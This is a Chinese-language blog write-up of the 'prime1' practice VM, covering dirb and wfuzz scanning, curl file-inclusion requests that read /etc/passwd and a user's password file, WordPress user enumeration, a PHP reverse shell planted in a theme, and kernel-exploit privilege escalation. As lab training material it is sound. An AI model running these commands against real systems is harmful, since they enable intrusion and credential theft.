prime1
主机发现
发现服务、得到80 http、22 ssh
- 有登录框就SQL注入、密码爆破
- 无登录框就目录扫描
目录扫描:drib dirsearch 御剑 dirbuster(kali终端输入,启动图形化界面) burpsuite
-
普通扫描
dirb http://192.168.218.146/
得到
http://192.168.218.146/dev http://192.168.218.146/index.php http://192.168.218.146/wordpress
-
指定扫描
-X指定后缀扫描
dirb http://192.168.218.146/ -X .txt,.php,.zip
得到
http://192.168.218.146/image.php http://192.168.218.146/index.php http://192.168.218.146/secret.txt
挨个进入发现secret.txt
提示使用fuzz工具,看到location.txt会知道怎么做
wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.218.146/index.php?FUZZ
过滤12个word结果
wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hc 404 --hw 12 http://192.168.218.146?FUZZ=wuya
得到提示file,根据上一步提示文件location.txt
提示使用secrettier360参数在其他php页面进行挖掘信息,访问
curl http://192.168.218.146/image.php?secrettier360=/etc/passwd
结合刚才发现的读取文件漏洞,构造
curl http://192.168.218.146/image.php?secrettier360=/home/saket/password.txt
现在有密码,通过wpsan扫描用户名
wpscan --url http://192.168.218.146/wordpress/ --enumerate u
利用漏洞进行代码上传
生成php反弹shell
在网站写入shell
启动msfconsole
run然后访问
wordpress/wp-content/themes/twentynineteen/secret.php
提权
查看版本
使用msf查找
searchsploit 16.04 Ubuntu
先将文件拷贝到root下
我的kali版本太高,所以使用靶机进行编译
将文件上传到/tmp
标签:php,http,扫描,192.168,218.146,prime1,txt From: https://www.cnblogs.com/yang-ace/p/18166634